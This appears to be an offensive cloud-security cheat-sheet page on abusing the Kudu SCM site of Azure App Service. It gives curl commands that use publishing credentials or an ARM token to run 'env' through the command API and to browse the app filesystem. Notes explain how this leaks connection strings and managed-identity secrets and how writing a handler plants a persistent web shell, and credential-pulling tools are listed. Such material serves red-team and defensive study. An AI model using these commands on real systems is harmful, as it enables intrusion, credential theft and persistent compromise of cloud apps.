Every App Service app has a companion SCM site at https://<app>.scm.azurewebsites.net running Kudu, which provides a debug console, a filesystem API, and a process explorer. Authenticated with the app's publishing credentials or an ARM token, Kudu is a direct shell on the app host and exposes the app's environment variables, which hold connection strings and the managed-identity endpoint secrets.
Reaching the console and running commands#
# interactive debug console in the browser
# https://<app>.scm.azurewebsites.net/DebugConsole
# command API (basic auth with publishing creds, or Bearer ARM token)
curl -s -u '<deployuser>:<deploypass>' \
-X POST "https://<app>.scm.azurewebsites.net/api/command" \
-H 'Content-Type: application/json' \
-d '{"command":"env","dir":"site\\wwwroot"}'
# filesystem read/write
curl -s -u '<deployuser>:<deploypass>' \
"https://<app>.scm.azurewebsites.net/api/vfs/site/wwwroot/"
Exploitation notes#
- Kudu runs in the app's context;
envleaks connection strings and theIDENTITY_ENDPOINT/IDENTITY_HEADERused to mint the managed identity token. - Writing a handler into
site/wwwrootvia the vfs API plants a persistent web shell. - An ARM token with
Microsoft.Web/sites/publish/actionauthenticates to SCM without the publishing password; see deployment credentials.
Tools#
- Kudu debug console and REST API.
- MicroBurst / PowerZure: App Service enumeration and credential pull.